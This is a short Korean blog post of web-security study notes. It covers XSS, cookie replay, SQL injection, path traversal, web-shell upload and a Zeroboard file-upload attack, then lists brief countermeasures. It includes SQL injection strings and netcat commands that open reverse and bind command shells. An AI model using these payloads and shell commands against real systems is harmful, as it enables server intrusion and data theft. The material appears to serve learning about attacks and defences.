1. XSS
   글쓰기 할 때, 게시물에 스크립트 작성
   대응: 문자열 대체
   ex) 열람자의 쿠키값 전송

2. 인증 및 세션관리 replay attack
    쿠키값으로 해당 사용자로 로그인.
    버퍼플러쉬. http 헤더 조작
    대응: 쿠키값 암호화

3. SQL Injection
    [' or 1 = 1 --] select 쿼리문에 대해서 true 리턴
    [' or 1 = (@@version) --]
    대웅: XSS와 유사

4. File Download
    상대경로로 접근해서 시스템 폴더 ACCESS

5. File Upload
    web 쉘

* NCSC 국정원 (국각사이버안전센터)
   - URL http://www.ncsc.go.kr/
   - USB해킹방지
   - 문서암호화

* 제로보드 취약점 공격
  ① File Upload
      - 제로보드에서 .asp 필터링하지만, .asa 필터링 안함
      - /bbs/data/free/shell.txt
      - WebAdmin 2.x
  ② 리버스텔넷
      (넷캐쉬)파이프라인 프로그램
       nc.exe
  ③ 파이프 통신 nc -l -p 9098
      클라이언트)
      nc IP 9098 -e "c:\cmd.exe 경로"
      아웃바운드 리버스 커넥션
  ④ 서버측에서 직접 얻기    
      서버 nc -l -p 9098 -e "cmd경로"
      클라이언트)
      nc 서버IP 9098 (서버 시스템쉘 획득)
   ⑤ char(76)
        ascii코드값을 캐릭터로 변환

* 보안대책
   - 실행폴더 권한 없애기
   - 업로드폴더를 웹폴더 밖에 두기
Posted by 창신다이
BLOG main image
오랫동안 꿈을 그리는 사람은 마침내 그 꿈을 닮아 간다. -앙드레 말로- by 창신다이

공지사항

카테고리

분류 전체보기 (248)
공장이야기 (115)
Education (30)
회사이야기 (19)
일상 (73)

최근에 올라온 글

최근에 달린 댓글

최근에 받은 트랙백

Total :
Today : Yesterday :